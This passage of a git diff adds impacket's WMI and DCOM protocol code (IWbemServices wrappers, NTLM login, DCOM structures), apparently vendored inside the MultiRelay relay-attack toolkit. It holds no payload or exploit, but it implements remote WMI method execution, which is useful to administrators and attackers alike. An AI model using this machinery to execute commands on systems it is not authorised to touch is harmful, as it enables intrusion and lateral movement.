lTimeout): + request = IWbemFetchSmartEnum_GetSmartEnum() + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + +class IWbemCallResult(IRemUnknown): + def __init__(self, interface): + IRemUnknown.__init__(self,interface) + self._iid = IID_IWbemCallResult + + def GetResultObject(self, lTimeout): + request = IWbemCallResult_GetResultObject() + request['lTimeout'] = lTimeout + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def GetResultString(self, lTimeout): + request = IWbemCallResult_GetResultString() + request['lTimeout'] = lTimeout + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def GetResultServices(self, lTimeout): + request = IWbemCallResult_GetResultServices() + request['lTimeout'] = lTimeout + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def GetCallStatus(self, lTimeout): + request = IWbemCallResult_GetCallStatus() + request['lTimeout'] = lTimeout + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp['plStatus'] + +class IEnumWbemClassObject(IRemUnknown): + def __init__(self, interface, iWbemServices = None): + IRemUnknown.__init__(self,interface) + self._iid = IID_IEnumWbemClassObject + self.__iWbemServices = iWbemServices + + def Reset(self): + request = IEnumWbemClassObject_Reset() + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def Next(self, lTimeout, uCount): + request = IEnumWbemClassObject_Next() + request['lTimeout'] = lTimeout + request['uCount'] = uCount + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + interfaces = list() + for interface in resp['apObjects']: + interfaces.append(IWbemClassObject( + INTERFACE(self.get_cinstance(), b''.join(interface['abData']), self.get_ipidRemUnknown(), + oxid=self.get_oxid(), target=self.get_target()), self.__iWbemServices)) + + return interfaces + + def NextAsync(self, lTimeout, pSink): + request = IEnumWbemClassObject_NextAsync() + request['lTimeout'] = lTimeout + request['pSink'] = pSink + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def Clone(self): + request = IEnumWbemClassObject_Clone() + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def Skip(self, lTimeout, uCount): + request = IEnumWbemClassObject_Skip() + request['lTimeout'] = lTimeout + request['uCount'] = uCount + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + +class IWbemServices(IRemUnknown): + def __init__(self, interface): + IRemUnknown.__init__(self,interface) + self._iid = IID_IWbemServices + + def OpenNamespace(self, strNamespace, lFlags=0, pCtx = NULL): + request = IWbemServices_OpenNamespace() + request['strNamespace']['asData'] = strNamespace + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def CancelAsyncCall(self,IWbemObjectSink ): + request = IWbemServices_CancelAsyncCall() + request['IWbemObjectSink'] = IWbemObjectSink + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp['ErrorCode'] + + def QueryObjectSink(self): + request = IWbemServices_QueryObjectSink() + request['lFlags'] = 0 + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return INTERFACE(self.get_cinstance(), b''.join(resp['ppResponseHandler']['abData']), self.get_ipidRemUnknown(), + target=self.get_target()) + + def GetObject(self, strObjectPath, lFlags=0, pCtx=NULL): + request = IWbemServices_GetObject() + request['strObjectPath']['asData'] = strObjectPath + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + ppObject = IWbemClassObject( + INTERFACE(self.get_cinstance(), b''.join(resp['ppObject']['abData']), self.get_ipidRemUnknown(), + oxid=self.get_oxid(), target=self.get_target()), self) + if resp['ppCallResult'] != NULL: + ppcallResult = IWbemCallResult( + INTERFACE(self.get_cinstance(), b''.join(resp['ppObject']['abData']), self.get_ipidRemUnknown(), + target=self.get_target())) + else: + ppcallResult = NULL + return ppObject, ppcallResult + + def GetObjectAsync(self, strNamespace, lFlags=0, pCtx = NULL): + request = IWbemServices_GetObjectAsync() + request['strObjectPath']['asData'] = checkNullString(strNamespace) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def PutClass(self, pObject, lFlags=0, pCtx=NULL): + request = IWbemServices_PutClass() + request['pObject'] = pObject + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def PutClassAsync(self, pObject, lFlags=0, pCtx=NULL): + request = IWbemServices_PutClassAsync() + request['pObject'] = pObject + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def DeleteClass(self, strClass, lFlags=0, pCtx=NULL): + request = IWbemServices_DeleteClass() + request['strClass']['asData'] = checkNullString(strClass) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def DeleteClassAsync(self, strClass, lFlags=0, pCtx=NULL): + request = IWbemServices_DeleteClassAsync() + request['strClass']['asData'] = checkNullString(strClass) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def CreateClassEnum(self, strSuperClass, lFlags=0, pCtx=NULL): + request = IWbemServices_CreateClassEnum() + request['strSuperClass']['asData'] = checkNullString(strSuperClass) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def CreateClassEnumAsync(self, strSuperClass, lFlags=0, pCtx=NULL): + request = IWbemServices_CreateClassEnumAsync() + request['strSuperClass']['asData'] = checkNullString(strSuperClass) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def PutInstance(self, pInst, lFlags=0, pCtx=NULL): + request = IWbemServices_PutInstance() + + if pInst is NULL: + request['pInst'] = pInst + else: + request['pInst']['ulCntData'] = len(pInst) + request['pInst']['abData'] = list(pInst.getData()) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return IWbemCallResult( + INTERFACE(self.get_cinstance(), b''.join(resp['ppCallResult']['abData']), self.get_ipidRemUnknown(), + target=self.get_target())) + + def PutInstanceAsync(self, pInst, lFlags=0, pCtx=NULL): + request = IWbemServices_PutInstanceAsync() + request['pInst'] = pInst + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def DeleteInstance(self, strObjectPath, lFlags=0, pCtx=NULL): + request = IWbemServices_DeleteInstance() + request['strObjectPath']['asData'] = checkNullString(strObjectPath) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return IWbemCallResult( + INTERFACE(self.get_cinstance(), b''.join(resp['ppCallResult']['abData']), self.get_ipidRemUnknown(), + target=self.get_target())) + + def DeleteInstanceAsync(self, strObjectPath, lFlags=0, pCtx=NULL): + request = IWbemServices_DeleteInstanceAsync() + request['strObjectPath']['asData'] = checkNullString(strObjectPath) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def CreateInstanceEnum(self, strSuperClass, lFlags=0, pCtx=NULL): + request = IWbemServices_CreateInstanceEnum() + request['strSuperClass']['asData'] = strSuperClass + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return IEnumWbemClassObject( + INTERFACE(self.get_cinstance(), b''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), + target=self.get_target())) + + def CreateInstanceEnumAsync(self, strSuperClass, lFlags=0, pCtx=NULL): + request = IWbemServices_CreateInstanceEnumAsync() + request['strSuperClass']['asData'] = checkNullString(strSuperClass) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + #def ExecQuery(self, strQuery, lFlags=WBEM_QUERY_FLAG_TYPE.WBEM_FLAG_PROTOTYPE, pCtx=NULL): + def ExecQuery(self, strQuery, lFlags=0, pCtx=NULL): + request = IWbemServices_ExecQuery() + request['strQueryLanguage']['asData'] = checkNullString('WQL') + request['strQuery']['asData'] = checkNullString(strQuery) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return IEnumWbemClassObject( + INTERFACE(self.get_cinstance(), b''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), + target=self.get_target()), self) + + def ExecQueryAsync(self, strQuery, lFlags=0, pCtx=NULL): + request = IWbemServices_ExecQueryAsync() + request['strQueryLanguage']['asData'] = checkNullString('WQL') + request['strQuery']['asData'] = checkNullString(strQuery) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def ExecNotificationQuery(self, strQuery, lFlags=0, pCtx=NULL): + request = IWbemServices_ExecNotificationQuery() + request['strQueryLanguage']['asData'] = checkNullString('WQL') + request['strQuery']['asData'] = checkNullString(strQuery) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return IEnumWbemClassObject( + INTERFACE(self.get_cinstance(), b''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), + target=self.get_target()), self) + + def ExecNotificationQueryAsync(self, strQuery, lFlags=0, pCtx=NULL): + request = IWbemServices_ExecNotificationQueryAsync() + request['strQueryLanguage']['asData'] = checkNullString('WQL') + request['strQuery']['asData'] = checkNullString(strQuery) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + def ExecMethod(self, strObjectPath, strMethodName, lFlags=0, pCtx=NULL, pInParams=NULL, ppOutParams = NULL): + request = IWbemServices_ExecMethod() + request['strObjectPath']['asData'] = checkNullString(strObjectPath) + request['strMethodName']['asData'] = checkNullString(strMethodName) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + if pInParams is NULL: + request['pInParams'] = pInParams + else: + request['pInParams']['ulCntData'] = len(pInParams) + request['pInParams']['abData'] = list(pInParams.getData()) + + request.fields['ppCallResult'] = NULL + if ppOutParams is NULL: + request.fields['ppOutParams'].fields['Data'] = NULL + else: + request['ppOutParams']['ulCntData'] = len(ppOutParams.getData()) + request['ppOutParams']['abData'] = list(ppOutParams.getData()) + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return IWbemClassObject( + INTERFACE(self.get_cinstance(), b''.join(resp['ppOutParams']['abData']), self.get_ipidRemUnknown(), + oxid=self.get_oxid(), target=self.get_target())) + + def ExecMethodAsync(self, strObjectPath, strMethodName, lFlags=0, pCtx=NULL, pInParams=NULL): + request = IWbemServices_ExecMethodAsync() + request['strObjectPath']['asData'] = checkNullString(strObjectPath) + request['strMethodName']['asData'] = checkNullString(strMethodName) + request['lFlags'] = lFlags + request['pCtx'] = pCtx + request['pInParams'] = pInParams + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + +class IWbemLevel1Login(IRemUnknown): + def __init__(self, interface): + IRemUnknown.__init__(self,interface) + self._iid = IID_IWbemLevel1Login + + def EstablishPosition(self): + request = IWbemLevel1Login_EstablishPosition() + request['reserved1'] = NULL + request['reserved2'] = 0 + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp['LocaleVersion'] + + def RequestChallenge(self): + request = IWbemLevel1Login_RequestChallenge() + request['reserved1'] = NULL + request['reserved2'] = NULL + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp['reserved3'] + + def WBEMLogin(self): + request = IWbemLevel1Login_WBEMLogin() + request['reserved1'] = NULL + request['reserved2'] = NULL + request['reserved3'] = 0 + request['reserved4'] = NULL + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp['reserved5'] + + def NTLMLogin(self, wszNetworkResource, wszPreferredLocale, pCtx): + request = IWbemLevel1Login_NTLMLogin() + request['wszNetworkResource'] = checkNullString(wszNetworkResource) + request['wszPreferredLocale'] = checkNullString(wszPreferredLocale) + request['lFlags'] = 0 + request['pCtx'] = pCtx + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return IWbemServices( + INTERFACE(self.get_cinstance(), b''.join(resp['ppNamespace']['abData']), self.get_ipidRemUnknown(), + target=self.get_target())) + + +if __name__ == '__main__': + # Example 1 + baseClass = b'xV4\x12\xd0\x00\x00\x00\x05\x00DPRAVAT-DEV\x00\x00ROOT\x00\x1d\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80f\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\n\x00\x00\x00\x05\xff\xff\xff\xff<\x00\x00\x80\x00Base\x00\x00Id\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x004\x00\x00\x00\x01\x00\x00\x80\x13\x0b\x00\x00\x00\xff\xff\x00sint32\x00\x0c\x00\x00\x00\x00\x004\x00\x00\x00\x00\x80\x00\x80\x13\x0b\x00\x00\x00\xff\xff\x00sint32\x00' + + #encodingUnit = ENCODING_UNIT(baseClass) + #encodingUnit.dump() + #encodingUnit['ObjectBlock'].printInformation() + #print "LEN ", len(baseClass), len(encodingUnit) + + #myClass = b"xV4\x12.\x02\x00\x00\x05\x00DPRAVAT-DEV\x00\x00ROOT\x00f\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\n\x00\x00\x00\x05\xff\xff\xff\xff<\x00\x00\x80\x00Base\x00\x00Id\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x004\x00\x00\x00\x01\x00\x00\x80\x13\x0b\x00\x00\x00\xff\xff\x00sint32\x00\x0c\x00\x00\x00\x00\x004\x00\x00\x00\x00\x80v\x01\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x0e\x00\x00\x00\x00Base\x00\x06\x00\x00\x00\x11\x00\x00\x00\t\x00\x00\x00\x00\x08\x00\x00\x00\x16\x00\x00\x00\x04\x00\x00\x00'\x00\x00\x00.\x00\x00\x00U\x00\x00\x00\\\x00\x00\x00\x99\x00\x00\x00\xa0\x00\x00\x00\xc7\x00\x00\x00\xcb\x00\x00\x00G\xff\xff\xff\xff\xff\xff\xff\xff\xfd\x00\x00\x00\xff\xff\xff\xff\x11\x01\x00\x80\x00MyClass\x00\x00Description\x00\x00MyClass Example\x00\x00Array\x00\x13 \x00\x00\x03\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00M\x00\x00\x00\x00uint32\x00\x00Data1\x00\x08\x00\x00\x00\x01\x00\x04\x00\x00\x00\x01\x00\x00\x00'\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00\x91\x00\x00\x00\x03\x00\x00\x80\x00\x0b\x00\x00\x00\xff\xff\x04\x00\x00\x80\x00\x0b\x00\x00\x00\xff\xff\x00string\x00\x00Data2\x00\x08\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00\xbf\x00\x00\x00\x00string\x00\x00Id\x00\x03@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\n\x00\x00\x80#\x08\x00\x00\x00\xf5\x00\x00\x00\x01\x00\x00\x803\x0b\x00\x00\x00\xff\xff\x00sint32\x00\x00defaultValue\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00s\x00\x00\x00\x802\x00\x00defaultValue\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00" + #hexdump(myClass) + #encodingUnit = ENCODING_UNIT(myClass) + #print "LEN ", len(myClass), len(encodingUnit) + #encodingUnit.dump() + #encodingUnit['ObjectBlock'].printInformation() + + #instanceMyClass = b"xV4\x12\xd3\x01\x00\x00\x06\x00DPRAVAT-DEV\x00\x00ROOT\x00v\x01\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x0e\x00\x00\x00\x00Base\x00\x06\x00\x00\x00\x11\x00\x00\x00\t\x00\x00\x00\x00\x08\x00\x00\x00\x16\x00\x00\x00\x04\x00\x00\x00'\x00\x00\x00.\x00\x00\x00U\x00\x00\x00\\\x00\x00\x00\x99\x00\x00\x00\xa0\x00\x00\x00\xc7\x00\x00\x00\xcb\x00\x00\x00G\xff\xff\xff\xff\xff\xff\xff\xff\xfd\x00\x00\x00\xff\xff\xff\xff\x11\x01\x00\x80\x00MyClass\x00\x00Description\x00\x00MyClass Example\x00\x00Array\x00\x13 \x00\x00\x03\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00M\x00\x00\x00\x00uint32\x00\x00Data1\x00\x08\x00\x00\x00\x01\x00\x04\x00\x00\x00\x01\x00\x00\x00'\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00\x91\x00\x00\x00\x03\x00\x00\x80\x00\x0b\x00\x00\x00\xff\xff\x04\x00\x00\x80\x00\x0b\x00\x00\x00\xff\xff\x00string\x00\x00Data2\x00\x08\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\n\x00\x00\x80\x03\x08\x00\x00\x00\xbf\x00\x00\x00\x00string\x00\x00Id\x00\x03@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\n\x00\x00\x80#\x08\x00\x00\x00\xf5\x00\x00\x00\x01\x00\x00\x803\x0b\x00\x00\x00\xff\xff\x00sint32\x00\x00defaultValue\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x00\x00\x00\x00 {\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x04\x00\x00\x00\x01&\x00\x00\x80\x00MyClass\x00\x03\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00StringField\x00" + #encodingUnit = ENCODING_UNIT(instanceMyClass) + #encodingUnit.dump() + #encodingUnit['ObjectBlock'].printInformation() diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py new file mode 100644 index 0000000..cf7651b --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py @@ -0,0 +1,1903 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [MS-DCOM] Interface implementation +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Some calls have helper functions, which makes it even easier to use. +# They are located at the end of this file. +# Helper functions start with "h". +# There are test cases for them too. +# +# ToDo: +# [X] Use the same DCE connection for all the calls. Right now is connecting to the remote machine +# for each call, making it slower. +# +# [X] Implement a ping mechanism, otherwise the garbage collector at the server shuts down the objects if +# not used, returning RPC_E_DISCONNECTED +# +from __future__ import division +from __future__ import print_function +import socket +from struct import pack +from threading import Timer, currentThread + +from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRTLSTRUCT, UNKNOWNDATA +from impacket.dcerpc.v5.dtypes import LPWSTR, ULONGLONG, HRESULT, GUID, USHORT, WSTR, DWORD, LPLONG, LONG, PGUID, ULONG, \ + UUID, WIDESTR, NULL +from impacket import hresult_errors, LOG +from impacket.uuid import string_to_bin, uuidtup_to_bin, generate +from impacket.dcerpc.v5.rpcrt import TypeSerialization1, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_NONE, \ + RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_WINNT, DCERPCException +from impacket.dcerpc.v5 import transport + +CLSID_ActivationContextInfo = string_to_bin('000001a5-0000-0000-c000-000000000046') +CLSID_ActivationPropertiesIn = string_to_bin('00000338-0000-0000-c000-000000000046') +CLSID_ActivationPropertiesOut = string_to_bin('00000339-0000-0000-c000-000000000046') +CLSID_CONTEXT_EXTENSION = string_to_bin('00000334-0000-0000-c000-000000000046') +CLSID_ContextMarshaler = string_to_bin('0000033b-0000-0000-c000-000000000046') +CLSID_ERROR_EXTENSION = string_to_bin('0000031c-0000-0000-c000-000000000046') +CLSID_ErrorObject = string_to_bin('0000031b-0000-0000-c000-000000000046') +CLSID_InstanceInfo = string_to_bin('000001ad-0000-0000-c000-000000000046') +CLSID_InstantiationInfo = string_to_bin('000001ab-0000-0000-c000-000000000046') +CLSID_PropsOutInfo = string_to_bin('00000339-0000-0000-c000-000000000046') +CLSID_ScmReplyInfo = string_to_bin('000001b6-0000-0000-c000-000000000046') +CLSID_ScmRequestInfo = string_to_bin('000001aa-0000-0000-c000-000000000046') +CLSID_SecurityInfo = string_to_bin('000001a6-0000-0000-c000-000000000046') +CLSID_ServerLocationInfo = string_to_bin('000001a4-0000-0000-c000-000000000046') +CLSID_SpecialSystemProperties = string_to_bin('000001b9-0000-0000-c000-000000000046') +IID_IActivation = uuidtup_to_bin(('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57','0.0')) +IID_IActivationPropertiesIn = uuidtup_to_bin(('000001A2-0000-0000-C000-000000000046','0.0')) +IID_IActivationPropertiesOut = uuidtup_to_bin(('000001A3-0000-0000-C000-000000000046','0.0')) +IID_IContext = uuidtup_to_bin(('000001c0-0000-0000-C000-000000000046','0.0')) +IID_IObjectExporter = uuidtup_to_bin(('99fcfec4-5260-101b-bbcb-00aa0021347a','0.0')) +IID_IRemoteSCMActivator = uuidtup_to_bin(('000001A0-0000-0000-C000-000000000046','0.0')) +IID_IRemUnknown = uuidtup_to_bin(('00000131-0000-0000-C000-000000000046','0.0')) +IID_IRemUnknown2 = uuidtup_to_bin(('00000143-0000-0000-C000-000000000046','0.0')) +IID_IUnknown = uuidtup_to_bin(('00000000-0000-0000-C000-000000000046','0.0')) +IID_IClassFactory = uuidtup_to_bin(('00000001-0000-0000-C000-000000000046','0.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + if self.error_code in hresult_errors.ERROR_MESSAGES: + error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0] + error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] + return 'DCOM SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'DCOM SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ +# 2.2.1 OID +OID = ULONGLONG + +class OID_ARRAY(NDRUniConformantArray): + item = OID + +class POID_ARRAY(NDRPOINTER): + referent = ( + ('Data', OID_ARRAY), + ) + +# 2.2.2 SETID +SETID = ULONGLONG + +# 2.2.4 error_status_t +error_status_t = ULONG + +# 2.2.6 CID +CID = GUID + +# 2.2.7 CLSID +CLSID = GUID + +# 2.2.8 IID +IID = GUID +PIID = PGUID + +# 2.2.9 IPID +IPID = GUID + +# 2.2.10 OXID +OXID = ULONGLONG + +# 2.2.18 OBJREF +FLAGS_OBJREF_STANDARD = 0x00000001 +FLAGS_OBJREF_HANDLER = 0x00000002 +FLAGS_OBJREF_CUSTOM = 0x00000004 +FLAGS_OBJREF_EXTENDED = 0x00000008 + +# 2.2.18.1 STDOBJREF +SORF_NOPING = 0x00001000 + +# 2.2.20 Context +CTXMSHLFLAGS_BYVAL = 0x00000002 + +# 2.2.20.1 PROPMARSHALHEADER +CPFLAG_PROPAGATE = 0x00000001 +CPFLAG_EXPOSE = 0x00000002 +CPFLAG_ENVOY = 0x00000004 + +# 2.2.22.2.1 InstantiationInfoData +ACTVFLAGS_DISABLE_AAA = 0x00000002 +ACTVFLAGS_ACTIVATE_32_BIT_SERVER = 0x00000004 +ACTVFLAGS_ACTIVATE_64_BIT_SERVER = 0x00000008 +ACTVFLAGS_NO_FAILURE_LOG = 0x00000020 + +# 2.2.22.2.2 SpecialPropertiesData +SPD_FLAG_USE_CONSOLE_SESSION = 0x00000001 + +# 2.2.28.1 IDL Range Constants +MAX_REQUESTED_INTERFACES = 0x8000 +MAX_REQUESTED_PROTSEQS = 0x8000 +MIN_ACTPROP_LIMIT = 1 +MAX_ACTPROP_LIMIT = 10 + +################################################################################ +# STRUCTURES +################################################################################ +class handle_t(NDRSTRUCT): + structure = ( + ('context_handle_attributes',ULONG), + ('context_handle_uuid',UUID), + ) + + def __init__(self, data=None, isNDR64=False): + NDRSTRUCT.__init__(self, data, isNDR64) + self['context_handle_uuid'] = b'\x00'*16 + + def isNull(self): + return self['context_handle_uuid'] == b'\x00'*16 + +# 2.2.11 COMVERSION +class COMVERSION(NDRSTRUCT): + structure = ( + ('MajorVersion',USHORT), + ('MinorVersion',USHORT), + ) + def __init__(self, data = None,isNDR64 = False): + NDRSTRUCT.__init__(self, data, isNDR64) + if data is None: + self['MajorVersion'] = 5 + self['MinorVersion'] = 7 + +class PCOMVERSION(NDRPOINTER): + referent = ( + ('Data', COMVERSION), + ) + +# 2.2.13.1 ORPC_EXTENT +# This MUST contain an array of bytes that form the extent data. +# The array size MUST be a multiple of 8 for alignment reasons. +class BYTE_ARRAY(NDRUniConformantArray): + item = 'c' + +class ORPC_EXTENT(NDRSTRUCT): + structure = ( + ('id',GUID), + ('size',ULONG), + ('data',BYTE_ARRAY), + ) + +# 2.2.13.2 ORPC_EXTENT_ARRAY +# ThisMUSTbeanarrayofORPC_EXTENTs.ThearraysizeMUSTbeamultipleof2for alignment reasons. +class PORPC_EXTENT(NDRPOINTER): + referent = ( + ('Data', ORPC_EXTENT), + ) + +class EXTENT_ARRAY(NDRUniConformantArray): + item = PORPC_EXTENT + +class PEXTENT_ARRAY(NDRPOINTER): + referent = ( + ('Data', EXTENT_ARRAY), + ) + +class ORPC_EXTENT_ARRAY(NDRSTRUCT): + structure = ( + ('size',ULONG), + ('reserved',ULONG), + ('extent',PEXTENT_ARRAY), + ) + +class PORPC_EXTENT_ARRAY(NDRPOINTER): + referent = ( + ('Data', ORPC_EXTENT_ARRAY), + ) + +# 2.2.13.3 ORPCTHIS +class ORPCTHIS(NDRSTRUCT): + structure = ( + ('version',COMVERSION), + ('flags',ULONG), + ('reserved1',ULONG), + ('cid',CID), + ('extensions',PORPC_EXTENT_ARRAY), + ) + +# 2.2.13.4 ORPCTHAT +class ORPCTHAT(NDRSTRUCT): + structure = ( + ('flags',ULONG), + ('extensions',PORPC_EXTENT_ARRAY), + ) + +# 2.2.14 MInterfacePointer +class MInterfacePointer(NDRSTRUCT): + structure = ( + ('ulCntData',ULONG), + ('abData',BYTE_ARRAY), + ) + +# 2.2.15 PMInterfacePointerInternal +class PMInterfacePointerInternal(NDRPOINTER): + referent = ( + ('Data', MInterfacePointer), + ) + +# 2.2.16 PMInterfacePointer +class PMInterfacePointer(NDRPOINTER): + referent = ( + ('Data', MInterfacePointer), + ) + +class PPMInterfacePointer(NDRPOINTER): + referent = ( + ('Data', PMInterfacePointer), + ) + +# 2.2.18 OBJREF +class OBJREF(NDRSTRUCT): + commonHdr = ( + ('signature',ULONG), + ('flags',ULONG), + ('iid',GUID), + ) + def __init__(self, data = None,isNDR64 = False): + NDRSTRUCT.__init__(self, data, isNDR64) + if data is None: + self['signature'] = 0x574F454D + +# 2.2.18.1 STDOBJREF +class STDOBJREF(NDRSTRUCT): + structure = ( + ('flags',ULONG), + ('cPublicRefs',ULONG), + ('oxid',OXID), + ('oid',OID), + ('ipid',IPID), + ) + +# 2.2.18.4 OBJREF_STANDARD +class OBJREF_STANDARD(OBJREF): + structure = ( + ('std',STDOBJREF), + ('saResAddr',':'), + ) + def __init__(self, data = None,isNDR64 = False): + OBJREF.__init__(self, data, isNDR64) + if data is None: + self['flags'] = FLAGS_OBJREF_STANDARD + +# 2.2.18.5 OBJREF_HANDLER +class OBJREF_HANDLER(OBJREF): + structure = ( + ('std',STDOBJREF), + ('clsid',CLSID), + ('saResAddr',':'), + ) + def __init__(self, data = None,isNDR64 = False): + OBJREF.__init__(self, data, isNDR64) + if data is None: + self['flags'] = FLAGS_OBJREF_HANDLER + +# 2.2.18.6 OBJREF_CUSTOM +class OBJREF_CUSTOM(OBJREF): + structure = ( + ('clsid',CLSID), + ('cbExtension',ULONG), + 